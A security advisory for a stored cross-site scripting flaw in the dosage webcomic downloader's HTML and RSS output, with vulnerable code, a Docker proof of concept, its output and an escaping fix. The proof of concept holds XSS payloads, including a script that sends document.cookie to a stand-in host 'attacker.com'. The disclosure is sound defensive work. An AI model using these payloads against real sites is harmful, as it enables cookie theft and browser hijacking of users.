MEDIUM 6.1

GHSA-75mw-h36v-2jv7

Dosage Vulnerable to Stored Cross-Site Scripting (XSS) in HTML/RSS Output Handlers

상세

## Summary

The HTML and RSS output handlers in `dosagelib/events.py` write user-controlled content (comic text and page URLs) directly into generated files without proper HTML escaping. When a user scrapes a malicious webcomic and opens the generated HTML/RSS file, attacker-controlled JavaScript can execute in their browser.

**CWE**: [CWE-79](https://cwe.mitre.org/data/definitions/79.html) - Improper Neutralization of Input During Web Page Generation (Cross-site Scripting)

---

## Details

### Vulnerable Code Locations

The vulnerability exists in `dosagelib/events.py` where untrusted content is written to HTML/RSS output without escaping:

**1. RSSEventHandler (lines 116-118)** ```python # events.py:116-118 if comic.text: description += '<br/>%s' % comic.text # ← Unescaped comic.text description += '<br/><a href="%s">View Comic Online</a>' % pageUrl # ← Unescaped URL ```

**2. HtmlEventHandler (lines 232, 238)** ```python # events.py:232 self.html.write(u'<li><a href="%s">%s</a>\n' % (pageUrl, pageUrl)) # ← Unescaped URL

# events.py:238 if text: self.html.write(u'<br/>%s\n' % text) # ← Unescaped text ```

### Root Cause

- `BasicScraper.fetchText()` in `scraper.py:422` calls `html.unescape()` on extracted text - The output handlers never call `html.escape()` before writing to files - No sanitization of URLs or text content occurs anywhere in the output pipeline

### Data Flow

``` Malicious webcomic page ↓ textSearch XPath extracts content (e.g., img/@title, div text) ↓ BasicScraper.fetchText() calls html.unescape() ↓ comic.text stored without sanitization ↓ HtmlEventHandler/RSSEventHandler writes to file without html.escape() ↓ Generated HTML/RSS contains executable JavaScript ```

---

## PoC

I created a proof-of-concept that demonstrates the vulnerability by simulating a malicious comic source.

### Prerequisites - Docker installed and running

### PoC Files

Create these files in a `poc/` directory:

**1. `poc/Dockerfile`** ```dockerfile FROM python:3.11-slim

LABEL description="PoC for dosage Stored XSS vulnerability (CWE-79)"

WORKDIR /app COPY . /app

# Install dependencies RUN pip install --no-cache-dir --quiet imagesize lxml requests rich platformdirs

# Install dosage ENV SETUPTOOLS_SCM_PRETEND_VERSION_FOR_DOSAGE=0.0.0 RUN pip install --no-cache-dir --quiet .

CMD ["python", "poc/poc.py"] ```

**2. `poc/poc.py`** ```python #!/usr/bin/env python3 """ PoC: Stored XSS in dosage HTML/RSS Output Handlers Demonstrates that untrusted comic content is written to output files unescaped. """

import sys from pathlib import Path from types import SimpleNamespace

from dosagelib.events import HtmlEventHandler, RSSEventHandler

# XSS payloads simulating malicious webcomic content MALICIOUS_TEXT = "Funny Comic!<script>fetch('http://attacker.com/?c='+document.cookie)</script>" MALICIOUS_URL = "javascript:alert('XSS-via-URL')"

def check_vulnerability(content: str, marker: str, description: str) -> bool: """Check if unescaped marker appears in content.""" if marker.lower() in content.lower(): print(f" [VULNERABLE] {description}") print(f" Found unescaped: {marker}") return True print(f" [SAFE] {description}") return False

def main(): print("=" * 70) print("PoC: Stored XSS in dosage HTML/RSS Output Handlers") print("=" * 70) print()

base = Path(__file__).parent / "output" base.mkdir(parents=True, exist_ok=True)

# Create dummy image file img_path = base / "payload.png" img_path.write_bytes(b"\x89PNG\r\n\x1a\n")

# Simulate comic with malicious content comic = SimpleNamespace( scraper=SimpleNamespace(name="MaliciousComic"), referrer=MALICIOUS_URL, text=MALICIOUS_TEXT, url="http://example.com/comic.png" )

vulnerabilities_found = 0

# Test RSS Handler print("[*] Testing RSSEventHandler...") rss_handler = RSSEventHandler(str(base), None, False) rss_handler.start() rss_handler.comicDownloaded(comic, str(img_path)) rss_handler.end() rss_path = Path(rss_handler.rssfn) rss_content = rss_path.read_text(encoding="utf-8") print(f" Output file: {rss_path}") if check_vulnerability(rss_content, "javascript:", "pageUrl in RSS href"): vulnerabilities_found += 1

# Test HTML Handler print() print("[*] Testing HtmlEventHandler...") html_handler = HtmlEventHandler(str(base), None, False) html_handler.start() html_path = Path(html_handler.html.name) html_handler.comicDownloaded(comic, str(img_path), text=MALICIOUS_TEXT) html_handler.end()

html_content = html_path.read_text(encoding="utf-8") print(f" Output file: {html_path}") if check_vulnerability(html_content, "<script>", "text param in HTML"): vulnerabilities_found += 1 if check_vulnerability(html_content, "javascript:", "pageUrl in HTML link"): vulnerabilities_found += 1

# Show vulnerable content print() print("-" * 70) print("Vulnerable Content in Generated HTML:") print("-" * 70) for line in html_content.splitlines(): if "<script>" in line.lower() or "javascript:" in line.lower(): print(f" {line}")

print() print("=" * 70) print(f"RESULT: {vulnerabilities_found} XSS vulnerability vectors confirmed!") print("=" * 70) return 0 if vulnerabilities_found > 0 else 1

if __name__ == "__main__": sys.exit(main()) ```

**3. `poc/run_poc.sh`** ```bash #!/usr/bin/env bash set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" ROOT_DIR="$(cd "${SCRIPT_DIR}/.." && pwd)"

echo "[*] Building PoC Docker image..." docker build -t dosage-xss-poc -f "${SCRIPT_DIR}/Dockerfile" "${ROOT_DIR}" --quiet

echo "[*] Running PoC..." docker run --rm dosage-xss-poc

echo "[*] Cleanup: docker rmi dosage-xss-poc" ```

### Running the PoC

```bash cd /path/to/dosage chmod +x poc/run_poc.sh ./poc/run_poc.sh ```

### PoC Output

``` ====================================================================== PoC: Stored XSS in dosage HTML/RSS Output Handlers ======================================================================

[*] Testing RSSEventHandler... Output file: /app/poc/output/dailydose.rss [VULNERABLE] pageUrl in RSS href Found unescaped: javascript:

[*] Testing HtmlEventHandler... Output file: /app/poc/output/html/comics-20251210.html [VULNERABLE] text param in HTML Found unescaped: <script> [VULNERABLE] pageUrl in HTML link Found unescaped: javascript:

---------------------------------------------------------------------- Vulnerable Content in Generated HTML: ---------------------------------------------------------------------- <li><a href="javascript:alert('XSS-via-URL')">javascript:alert('XSS-via-URL')</a> <br/>Funny Comic!<script>fetch('http://attacker.com/?c='+document.cookie)</script>

====================================================================== RESULT: 3 XSS vulnerability vectors confirmed! ====================================================================== ```

The output shows that: 1. The `javascript:` URL is written directly into `<a href>` attributes 2. The `<script>` tag from comic text appears unescaped in the HTML body

---

## Impact

### Who is affected? - Users who use `dosage --output html` or `dosage --output rss` options - Anyone who opens the generated HTML/RSS files in a browser

### Attack scenario 1. Attacker creates or compromises a webcomic site 2. Attacker injects JavaScript into image title/alt attributes: ```html <img src="comic.png" title="Funny!<script>alert(1)</script>"> ``` 3. Victim runs: `dosage MaliciousComic --output html` 4. The generated `Comics/html/comics-YYYYMMDD.html` contains the unescaped script 5. When victim opens the file, JavaScript executes

### Potential consequences - **Cookie theft** if files are served over HTTP - **Local file access** via `file://` protocol - **Phishing attacks** through DOM manipulation

---

## Recommended Fix

Escape all user-controlled content before writing to HTML/RSS:

```python import html

# In RSSEventHandler.comicDownloaded() - events.py around line 116: if comic.text: description += '<br/>%s' % html.escape(comic.text) description += '<br/><a href="%s">View Comic Online</a>' % html.escape(pageUrl)

# In HtmlEventHandler.comicDownloaded() - events.py around line 232: self.html.write(u'<li><a href="%s">%s</a>\n' % (html.escape(pageUrl), html.escape(pageUrl)))

# events.py around line 238: if text: self.html.write(u'<br/>%s\n' % html.escape(text)) ```

For URLs, validating that they use safe protocols (`http://`, `https://`) would also help prevent javascript: URLs.

---

## Resources

- [CWE-79: Cross-site Scripting (XSS)](https://cwe.mitre.org/data/definitions/79.html) - [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html) - [Python html.escape() documentation](https://docs.python.org/3/library/html.html#html.escape)

---

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

PyPI / dosage

최초 영향 버전: 0 수정 버전: 3.3

수정 pip install --upgrade 'dosage>=3.3'

상세

이 버전이 영향받나요?

영향 패키지

참고